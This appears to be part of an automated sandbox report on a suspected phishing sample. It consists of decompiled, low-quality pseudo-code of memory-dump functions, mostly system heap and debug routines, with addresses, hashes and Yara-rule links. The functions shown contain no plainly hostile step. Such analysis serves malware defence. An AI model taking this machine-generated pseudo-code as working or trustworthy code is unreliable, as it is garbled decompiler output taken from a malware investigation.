				char _v17;
				signed int* _v20;
				void* _t24;
				signed int _t26;
				signed int* _t28;
				signed int* _t38;
				signed int _t39;
				intOrPtr* _t47;
				signed int _t49;
				signed int _t54;
				void* _t62;

				_t38 = __ecx;
				_t47 = __edx;
				_v8 = __ecx;
				if(_a4 != 0 || _a8 != 0) {
					_v9 = 0;
					_t54 = 0;
					L9:
					 *0x334491e0(_a4, _a8);
					_t26 =  *_t47();
					_t39 = _t26;
					if(_t39 != 0) {
						 *((intOrPtr*)(_t39 + 0x34)) = 1;
						if(_v17 != 0) {
							_t49 = 0;
							L33362330(_t26, 0x334467c4);
							_t28 = _v20;
							if( *_t28 == _t54) {
								 *_t28 = _t39;
								 *((intOrPtr*)(_t39 + 0x34)) =  *((intOrPtr*)(_t39 + 0x34)) + 1;
								if(_t54 != 0) {
									 *(_t54 + 0x34) =  *(_t54 + 0x34) - 1;
									asm("sbb edi, edi");
									_t49 =  !( ~( *(_t54 + 0x34))) & _t54;
								}
							}
							E333624D0(0x334467c4);
							if(_t49 != 0) {
								E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t49);
							}
						}
						_t26 = _t39;
					}
					goto L17;
				} else {
					_v9 = 1;
					L33362330(_t24, 0x334467c4);
					_t54 =  *_t38;
					if(_t54 == 0) {
						L7:
						E333624D0(0x334467c4);
						goto L9;
					}
					_t62 =  *((intOrPtr*)(_t54 + 0x3c)) -  *0x3344690c; // 0x0
					if(_t62 != 0 ||  *((char*)(_t54 + 0x48)) == 0 &&  *((intOrPtr*)(_t54 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L7;
					} else {
						 *(_t54 + 0x34) =  *(_t54 + 0x34) + 1;
						E333624D0(0x334467c4);
						_t26 = _t54;
						L17:
						return _t26;
					}
				}
			}
















                                                                                                                                                                                  0x33353547
                                                                                                                                                                                  0x3335354a
                                                                                                                                                                                  0x3335354c
                                                                                                                                                                                  0x33353550
                                                                                                                                                                                  0x333535b2
                                                                                                                                                                                  0x333535b7
                                                                                                                                                                                  0x333535b9
                                                                                                                                                                                  0x333535c1
                                                                                                                                                                                  0x333535c7
                                                                                                                                                                                  0x333535c9
                                                                                                                                                                                  0x333535cd
                                                                                                                                                                                  0x333535d4
                                                                                                                                                                                  0x333535db
                                                                                                                                                                                  0x333535e2
                                                                                                                                                                                  0x333535e4
                                                                                                                                                                                  0x333535e9
                                                                                                                                                                                  0x333535ef
                                                                                                                                                                                  0x333535f1
                                                                                                                                                                                  0x333535f3
                                                                                                                                                                                  0x333535f8
                                                                                                                                                                                  0x333535fa
                                                                                                                                                                                  0x33353602
                                                                                                                                                                                  0x33353606
                                                                                                                                                                                  0x33353606
                                                                                                                                                                                  0x333535f8
                                                                                                                                                                                  0x3335360d
                                                                                                                                                                                  0x33353614
                                                                                                                                                                                  0x33353622
                                                                                                                                                                                  0x33353622
                                                                                                                                                                                  0x33353614
                                                                                                                                                                                  0x33353627
                                                                                                                                                                                  0x33353627
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33353558
                                                                                                                                                                                  0x3335355d
                                                                                                                                                                                  0x33353562
                                                                                                                                                                                  0x33353567
                                                                                                                                                                                  0x3335356b
                                                                                                                                                                                  0x333535a6
                                                                                                                                                                                  0x333535ab
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333535ab
                                                                                                                                                                                  0x33353570
                                                                                                                                                                                  0x33353576
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33353592
                                                                                                                                                                                  0x33353592
                                                                                                                                                                                  0x3335359a
                                                                                                                                                                                  0x3335359f
                                                                                                                                                                                  0x33353629
                                                                                                                                                                                  0x3335362f
                                                                                                                                                                                  0x3335362f
                                                                                                                                                                                  0x33353576

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                  • Opcode ID: 78f9b42d41c6fa2845aa74d6cfcad43ef9c0a2114900c891fc5dfcd5315edf13
                                                                                                                                                                                  • Instruction ID: 6c2cd762768c78bfb5c38b917c6e886d5b573d3d54738c4f15e85b702214ebc0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 78f9b42d41c6fa2845aa74d6cfcad43ef9c0a2114900c891fc5dfcd5315edf13
                                                                                                                                                                                  • Instruction Fuzzy Hash: CA21D5359467409FF722DF04C9C4F1ABBA5EF80B24F55986DF84147645C774E848CB92
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333DA130 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                                                                  			E333DA130(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _t24;
				intOrPtr* _t31;

				_t24 =  *( *[fs:0x30] + 0x68) & 0x02000100;
				if(_t24 != 0x2000000) {
					_t31 =  *0x33445a44; // 0x0
					if(_t31 != 0) {
						 *0x334491e0(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
						_t24 =  *_t31();
					}
					return _t24;
				}
				return E333DA1A7(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
			}





                                                                                                                                                                                  0x333da13e
                                                                                                                                                                                  0x333da148
                                                                                                                                                                                  0x333da170
                                                                                                                                                                                  0x333da178
                                                                                                                                                                                  0x333da19a
                                                                                                                                                                                  0x333da1a0
                                                                                                                                                                                  0x333da1a0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333da1a2
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                  • Opcode ID: 5f796d9a7e8aa12dab9cdaa4c6193d7ace96ffbdc54256e52d2fd87e28fdcf8f
                                                                                                                                                                                  • Instruction ID: 681d075da193aaafcb493146a3301dd12e52769e20fba6087f7d6421b823c2b8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f796d9a7e8aa12dab9cdaa4c6193d7ace96ffbdc54256e52d2fd87e28fdcf8f
                                                                                                                                                                                  • Instruction Fuzzy Hash: D9015A36551259ABDF029F84CD40EDA3FA6FB4C754F058111FE1866620C736D971EB81
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333492AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 26%
                                                                                                                                                                                  			E333492AF(void* __ecx) {
				char _v5;
				void* _t12;
				intOrPtr* _t22;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				_v5 = 0;
				_t22 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t22 != 0) {
					 *0x334491e0("true", __ecx,  *((intOrPtr*)(__ecx + 0x10)),  *((intOrPtr*)(__ecx + 0x18)), 0,  &_v5);
					 *_t22();
				}
				_t12 = E33349303(_t25 + 0x5c);
				if(( *(_t25 + 4) & 0x00000002) == 0) {
					_t12 = E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t25 - 4);
				}
				return _t12;
			}







                                                                                                                                                                                  0x333492b4
                                                                                                                                                                                  0x333492b6
                                                                                                                                                                                  0x333492b8
                                                                                                                                                                                  0x333492bd
                                                                                                                                                                                  0x333492c2
                                                                                                                                                                                  0x333492d5
                                                                                                                                                                                  0x333492db
                                                                                                                                                                                  0x333492db
                                                                                                                                                                                  0x333492e0
                                                                                                                                                                                  0x333492e9
                                                                                                                                                                                  0x333492fa
                                                                                                                                                                                  0x333492fa
                                                                                                                                                                                  0x33349302

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                  • Opcode ID: 86ac590f8356648bf6ac5017d80506e07af45a2f2660a99a7dc80eb0b9ce5bf6
                                                                                                                                                                                  • Instruction ID: a2eda90cae1c7599c3e87abf6f66992d95cd8023d7f830ec5867caf94c23c283
                                                                                                                                                                                  • Opcode Fuzzy Hash: 86ac590f8356648bf6ac5017d80506e07af45a2f2660a99a7dc80eb0b9ce5bf6
                                                                                                                                                                                  • Instruction Fuzzy Hash: EFF0FA32248704ABE731DF08CC04F8ABBEDEF80B10F08012CA542938A0DAA0E909C660
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3338A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                                  			E3338A580(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t88;
				signed short* _t89;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				signed int _t96;
				signed int _t100;
				void* _t101;
				signed int _t102;
				signed int _t104;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr _t122;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t135;
				signed int _t136;
				void* _t137;
				signed char _t139;
				signed short* _t141;
				signed int _t144;
				signed int _t145;
				void* _t147;

				_t143 = __esi;
				_t140 = __edi;
				_push(0x3c);
				_push(0x3342c9a0);
				E333A7BE4(__ebx, __edi, __esi);
				 *(_t147 - 0x48) =  *(_t147 + 0x10);
				_t110 =  *(_t147 + 8);
				 *(_t147 - 0x4c) = _t110;
				_t114 = 0;
				 *((char*)(_t147 - 0x19)) = 0;
				_t87 =  *[fs:0x30];
				if(( *(_t87 + 0x68) & 0x00000800) != 0) {
					__eflags =  *0x33446d3c - _t114; // 0x0
					if(__eflags != 0) {
						L6:
						__eflags = _t110;
						if(_t110 == 0) {
							L9:
							 *(_t147 - 0x34) = _t114;
							 *(_t147 - 4) = _t114;
							__eflags = _t110;
							if(_t110 == 0) {
								L15:
								_t144 = _t114;
								 *(_t147 - 0x28) = _t144;
								_t128 = _t114;
								 *(_t147 - 0x40) = _t128;
								_t88 = 0x21;
								_t141 =  *(_t147 + 0x14);
								__eflags =  *_t141 - _t88;
								if( *_t141 != _t88) {
									 *(_t147 - 0x24) = _t114;
									L20:
									_t89 = _t141;
									 *(_t147 - 0x30) = _t89;
									while(1) {
										_t115 =  *_t89 & 0x0000ffff;
										__eflags = _t115;
										if(_t115 != 0) {
											goto L27;
										} else {
											break;
										}
										while(1) {
											L27:
											_t89 =  &(_t89[1]);
											 *(_t147 - 0x30) = _t89;
											__eflags = _t115;
											if(_t115 == 0) {
												break;
											}
											_t115 =  *_t89 & 0x0000ffff;
										}
										_t128 = _t128 + 1;
										 *(_t147 - 0x40) = _t128;
									}
									__eflags = _t128;
									if(_t128 == 0) {
										L50:
										_t145 = _t144 << 0x12;
										__eflags = _t145;
										L51:
										 *(_t147 - 0x34) = _t145;
										 *(_t147 - 4) = 0xfffffffe;
										E333C66C4(_t110);
										_t91 = _t145;
										L2:
										 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0x10));
										return _t91;
									}
									_t119 = E333F7786(_t110, _t128);
									 *(_t147 - 0x20) = _t119;
									__eflags = _t119;
									if(_t119 == 0) {
										goto L50;
									}
									_t93 = 0x17;
									 *(_t147 - 0x2c) = _t93;
									 *(_t147 - 0x44) = _t93;
									_t144 =  *(_t119 + 0xc) & 0x0000ffff;
									 *(_t147 - 0x28) = _t144;
									__eflags = _t144;
									if(_t144 != 0) {
										__eflags = _t144 - 0x800;
										if(_t144 != 0x800) {
											L34:
											_t129 =  *(_t147 + 0x10);
											__eflags = _t129;
											if(_t129 == 0) {
												L42:
												_t94 = 0;
												__eflags = 0;
												_t130 = 0;
												 *(_t147 - 0x24) = 0;
												L43:
												 *(_t147 - 0x3c) = _t130;
												 *(_t147 - 0x30) = _t141;
												while(1) {
													__eflags =  *_t141;
													_t110 =  *(_t147 + 8);
													if( *_t141 == 0) {
														goto L50;
													}
													_t120 = _t119 + 0x10;
													 *((intOrPtr*)(_t147 - 0x38)) = _t119 + 0x10;
													__eflags = _t130;
													if(_t130 != 0) {
														L33375C3F(_t120,  *(_t147 - 0x2c) +  *(_t147 - 0x2c), _t130);
														_t94 =  *(_t147 - 0x24);
														_t122 =  *((intOrPtr*)(_t147 - 0x38));
														_t120 = _t122 + _t94 * 2;
														 *((intOrPtr*)(_t147 - 0x38)) = _t122 + _t94 * 2;
													}
													__eflags =  *(_t147 - 0x2c) - _t94 +  *(_t147 - 0x2c) - _t94;
													L33375C3F(_t120,  *(_t147 - 0x2c) - _t94 +  *(_t147 - 0x2c) - _t94, _t141);
													do {
														_t96 =  *_t141 & 0x0000ffff;
														_t141 =  &(_t141[1]);
														 *(_t147 - 0x30) = _t141;
														__eflags = _t96;
													} while (_t96 != 0);
													_t119 =  *(_t147 - 0x20) + 0x40;
													 *(_t147 - 0x20) = _t119;
													_t94 =  *(_t147 - 0x24);
													_t130 =  *(_t147 - 0x3c);
												}
												goto L50;
											}
											_t54 = _t129 + 2; // 0x3
											 *(_t147 - 0x3c) = _t54;
											do {
												_t100 =  *_t129;
												_t129 = _t129 + 2;
												__eflags = _t100;
											} while (_t100 != 0);
											_t135 = _t129 -  *(_t147 - 0x3c);
											__eflags = _t135;
											_t136 = _t135 >> 1;
											 *(_t147 - 0x24) = _t136;
											 *(_t147 - 0x3c) = _t136;
											if(_t135 == 0) {
												goto L42;
											}
											__eflags = _t136 - 0x13;
											if(_t136 < 0x13) {
												_t101 = 0x17;
												_t102 = _t101 - _t136;
												__eflags = _t102;
												 *(_t147 - 0x2c) = _t102;
												 *(_t147 - 0x44) = _t102;
												_t94 =  *(_t147 - 0x24);
											} else {
												_t94 = 0;
												 *(_t147 - 0x24) = 0;
											}
											__eflags =  *(_t147 - 0x3c) - 0x13;
											asm("sbb edx, edx");
											_t130 = _t136 &  *(_t147 - 0x48);
											goto L43;
										}
										_push(L"GlobalTags");
										L32:
										_t137 = 0x2e;
										__eflags = _t119 + 0x10;
										L33375C3F(_t119 + 0x10, _t137);
										_t119 =  *(_t147 - 0x20);
										L33:
										_t119 = _t119 + 0x40;
										__eflags = _t119;
										 *(_t147 - 0x20) = _t119;
										_t144 =  *(_t119 + 0xc) & 0x0000ffff;
										 *(_t147 - 0x28) = _t144;
										goto L34;
									}
									_t104 =  *(_t147 - 0x24);
									__eflags = _t104;
									if(_t104 == 0) {
										goto L33;
									}
									_push(_t104);
									goto L32;
								}
								_t36 =  &(_t141[1]); // 0x12
								 *(_t147 - 0x24) = _t36;
								while(1) {
									_t141 =  &(_t141[1]);
									 *(_t147 + 0x14) = _t141;
									__eflags = _t88;
									if(_t88 == 0) {
										goto L20;
									}
									_t88 =  *_t141 & 0x0000ffff;
								}
								goto L20;
							}
							_t139 =  *(_t147 + 0xc) |  *(_t110 + 0x44);
							__eflags = _t139 & 0x61000000;
							asm("bt edx, 0x1c");
							__eflags = (_t87 & 0xffffff00 | (_t139 & 0x61000000) >= 0x00000000) & (_t114 & 0xffffff00 | (_t139 & 0x61000000) != 0x00000000);
							if(__eflags == 0) {
								__eflags = _t139 & 0x00000001;
								if((_t139 & 0x00000001) == 0) {
									E3335FED0( *((intOrPtr*)(_t110 + 0xc8)));
									 *((char*)(_t147 - 0x19)) = 1;
								}
								_t114 = 0;
								__eflags = 0;
								goto L15;
							}
							_push( *(_t147 + 0x14));
							_push( *(_t147 + 0x10));
							_t145 = E333FF76A(_t110, _t110, _t139, _t140, _t143, __eflags);
							goto L51;
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0xddeeddee;
						if( *((intOrPtr*)(_t110 + 8)) == 0xddeeddee) {
							goto L1;
						}
						__eflags =  *(_t110 + 0x44) & 0x01000000;
						if(( *(_t110 + 0x44) & 0x01000000) != 0) {
							goto L1;
						}
						goto L9;
					}
					_t87 = L33365D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x258);
					 *0x33446d3c = _t87;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L1;
					}
					_t114 = 0;
					__eflags = 0;
					goto L6;
				}
				L1:
				_t91 = 0;
				goto L2;
			}





























                                                                                                                                                                                  0x3338a580
                                                                                                                                                                                  0x3338a580
                                                                                                                                                                                  0x3338a580
                                                                                                                                                                                  0x3338a582
                                                                                                                                                                                  0x3338a587
                                                                                                                                                                                  0x3338a58f
                                                                                                                                                                                  0x3338a592
                                                                                                                                                                                  0x3338a595
                                                                                                                                                                                  0x3338a598
                                                                                                                                                                                  0x3338a59a
                                                                                                                                                                                  0x3338a59d
                                                                                                                                                                                  0x3338a5aa
                                                                                                                                                                                  0x333c64a9
                                                                                                                                                                                  0x333c64af
                                                                                                                                                                                  0x333c64d5
                                                                                                                                                                                  0x333c64d5
                                                                                                                                                                                  0x333c64d7
                                                                                                                                                                                  0x333c64f3
                                                                                                                                                                                  0x333c64f3
                                                                                                                                                                                  0x333c64f6
                                                                                                                                                                                  0x333c64f9
                                                                                                                                                                                  0x333c64fb
                                                                                                                                                                                  0x333c6541
                                                                                                                                                                                  0x333c6541
                                                                                                                                                                                  0x333c6543
                                                                                                                                                                                  0x333c6546
                                                                                                                                                                                  0x333c6548
                                                                                                                                                                                  0x333c654d
                                                                                                                                                                                  0x333c654e
                                                                                                                                                                                  0x333c6551
                                                                                                                                                                                  0x333c6554
                                                                                                                                                                                  0x333c656c
                                                                                                                                                                                  0x333c656f
                                                                                                                                                                                  0x333c656f
                                                                                                                                                                                  0x333c6571
                                                                                                                                                                                  0x333c6574
                                                                                                                                                                                  0x333c6574
                                                                                                                                                                                  0x333c6577
                                                                                                                                                                                  0x333c657a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c65b6
                                                                                                                                                                                  0x333c65b6
                                                                                                                                                                                  0x333c65b6
                                                                                                                                                                                  0x333c65b9
                                                                                                                                                                                  0x333c65bc
                                                                                                                                                                                  0x333c65bf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c65c1
                                                                                                                                                                                  0x333c65c1
                                                                                                                                                                                  0x333c65c6
                                                                                                                                                                                  0x333c65c7
                                                                                                                                                                                  0x333c65c7
                                                                                                                                                                                  0x333c657c
                                                                                                                                                                                  0x333c657e
                                                                                                                                                                                  0x333c66a5
                                                                                                                                                                                  0x333c66a5
                                                                                                                                                                                  0x333c66a5
                                                                                                                                                                                  0x333c66a8
                                                                                                                                                                                  0x333c66a8
                                                                                                                                                                                  0x333c66ab
                                                                                                                                                                                  0x333c66b2
                                                                                                                                                                                  0x333c66b7
                                                                                                                                                                                  0x3338a5b2
                                                                                                                                                                                  0x3338a5b5
                                                                                                                                                                                  0x3338a5c1
                                                                                                                                                                                  0x3338a5c1
                                                                                                                                                                                  0x333c658b
                                                                                                                                                                                  0x333c658d
                                                                                                                                                                                  0x333c6590
                                                                                                                                                                                  0x333c6592
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c659a
                                                                                                                                                                                  0x333c659b
                                                                                                                                                                                  0x333c659e
                                                                                                                                                                                  0x333c65a1
                                                                                                                                                                                  0x333c65a5
                                                                                                                                                                                  0x333c65a8
                                                                                                                                                                                  0x333c65aa
                                                                                                                                                                                  0x333c65cc
                                                                                                                                                                                  0x333c65d2
                                                                                                                                                                                  0x333c65f4
                                                                                                                                                                                  0x333c65f4
                                                                                                                                                                                  0x333c65f7
                                                                                                                                                                                  0x333c65f9
                                                                                                                                                                                  0x333c6640
                                                                                                                                                                                  0x333c6640
                                                                                                                                                                                  0x333c6640
                                                                                                                                                                                  0x333c6642
                                                                                                                                                                                  0x333c6644
                                                                                                                                                                                  0x333c6647
                                                                                                                                                                                  0x333c6647
                                                                                                                                                                                  0x333c664a
                                                                                                                                                                                  0x333c664d
                                                                                                                                                                                  0x333c664f
                                                                                                                                                                                  0x333c6652
                                                                                                                                                                                  0x333c6655
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c6657
                                                                                                                                                                                  0x333c665a
                                                                                                                                                                                  0x333c665d
                                                                                                                                                                                  0x333c665f
                                                                                                                                                                                  0x333c6668
                                                                                                                                                                                  0x333c666d
                                                                                                                                                                                  0x333c6670
                                                                                                                                                                                  0x333c6673
                                                                                                                                                                                  0x333c6676
                                                                                                                                                                                  0x333c6676
                                                                                                                                                                                  0x333c667f
                                                                                                                                                                                  0x333c6681
                                                                                                                                                                                  0x333c6686
                                                                                                                                                                                  0x333c6686
                                                                                                                                                                                  0x333c6689
                                                                                                                                                                                  0x333c668c
                                                                                                                                                                                  0x333c668f
                                                                                                                                                                                  0x333c668f
                                                                                                                                                                                  0x333c6697
                                                                                                                                                                                  0x333c669a
                                                                                                                                                                                  0x333c669d
                                                                                                                                                                                  0x333c66a0
                                                                                                                                                                                  0x333c66a0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c664d
                                                                                                                                                                                  0x333c65fb
                                                                                                                                                                                  0x333c65fe
                                                                                                                                                                                  0x333c6601
                                                                                                                                                                                  0x333c6601
                                                                                                                                                                                  0x333c6604
                                                                                                                                                                                  0x333c6609
                                                                                                                                                                                  0x333c6609
                                                                                                                                                                                  0x333c660e
                                                                                                                                                                                  0x333c660e
                                                                                                                                                                                  0x333c6611
                                                                                                                                                                                  0x333c6613
                                                                                                                                                                                  0x333c6616
                                                                                                                                                                                  0x333c6619
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c661b
                                                                                                                                                                                  0x333c661e
                                                                                                                                                                                  0x333c6629
                                                                                                                                                                                  0x333c662a
                                                                                                                                                                                  0x333c662a
                                                                                                                                                                                  0x333c662c
                                                                                                                                                                                  0x333c662f
                                                                                                                                                                                  0x333c6632
                                                                                                                                                                                  0x333c6620
                                                                                                                                                                                  0x333c6620
                                                                                                                                                                                  0x333c6622
                                                                                                                                                                                  0x333c6622
                                                                                                                                                                                  0x333c6635
                                                                                                                                                                                  0x333c6639
                                                                                                                                                                                  0x333c663b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c663b
                                                                                                                                                                                  0x333c65d4
                                                                                                                                                                                  0x333c65d9
                                                                                                                                                                                  0x333c65db
                                                                                                                                                                                  0x333c65dc
                                                                                                                                                                                  0x333c65df
                                                                                                                                                                                  0x333c65e4
                                                                                                                                                                                  0x333c65e7
                                                                                                                                                                                  0x333c65e7
                                                                                                                                                                                  0x333c65e7
                                                                                                                                                                                  0x333c65ea
                                                                                                                                                                                  0x333c65ed
                                                                                                                                                                                  0x333c65f1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c65f1
                                                                                                                                                                                  0x333c65ac
                                                                                                                                                                                  0x333c65af
                                                                                                                                                                                  0x333c65b1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c65b3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c65b3
                                                                                                                                                                                  0x333c6556
                                                                                                                                                                                  0x333c6559
                                                                                                                                                                                  0x333c655c
                                                                                                                                                                                  0x333c655c
                                                                                                                                                                                  0x333c655f
                                                                                                                                                                                  0x333c6562
                                                                                                                                                                                  0x333c6565
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c6567
                                                                                                                                                                                  0x333c6567
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c655c
                                                                                                                                                                                  0x333c6500
                                                                                                                                                                                  0x333c6503
                                                                                                                                                                                  0x333c650c
                                                                                                                                                                                  0x333c6513
                                                                                                                                                                                  0x333c6515
                                                                                                                                                                                  0x333c652b
                                                                                                                                                                                  0x333c652e
                                                                                                                                                                                  0x333c6536
                                                                                                                                                                                  0x333c653b
                                                                                                                                                                                  0x333c653b
                                                                                                                                                                                  0x333c653f
                                                                                                                                                                                  0x333c653f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c653f
                                                                                                                                                                                  0x333c6517
                                                                                                                                                                                  0x333c651a
                                                                                                                                                                                  0x333c6524
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c6524
                                                                                                                                                                                  0x333c64d9
                                                                                                                                                                                  0x333c64e0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c64e6
                                                                                                                                                                                  0x333c64ed
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c64ed
                                                                                                                                                                                  0x333c64c1
                                                                                                                                                                                  0x333c64c6
                                                                                                                                                                                  0x333c64cb
                                                                                                                                                                                  0x333c64cd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c64d3
                                                                                                                                                                                  0x333c64d3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c64d3
                                                                                                                                                                                  0x3338a5b0
                                                                                                                                                                                  0x3338a5b0
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: GlobalTags
                                                                                                                                                                                  • API String ID: 0-1106856819
                                                                                                                                                                                  • Opcode ID: 48b0a6077b678bbb2c4dccaae3da0786f1fb9368380031194c988dc8e0fd13fb
                                                                                                                                                                                  • Instruction ID: ecc71e507967b233eb0068710f40e8f345bf5a56b5790811a2fd562ee952e63b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 48b0a6077b678bbb2c4dccaae3da0786f1fb9368380031194c988dc8e0fd13fb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B716DB9E8034A9FEB18CF98C98069DBBF5BF48350F28C12AE445A7245EB358D51CB50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3335965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                                  			E3335965A(signed int __ecx, intOrPtr* __edx, char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char* _v76;
				signed int _v80;
				char _v84;
				signed int _t78;
				intOrPtr _t100;
				signed int _t102;
				signed int _t103;
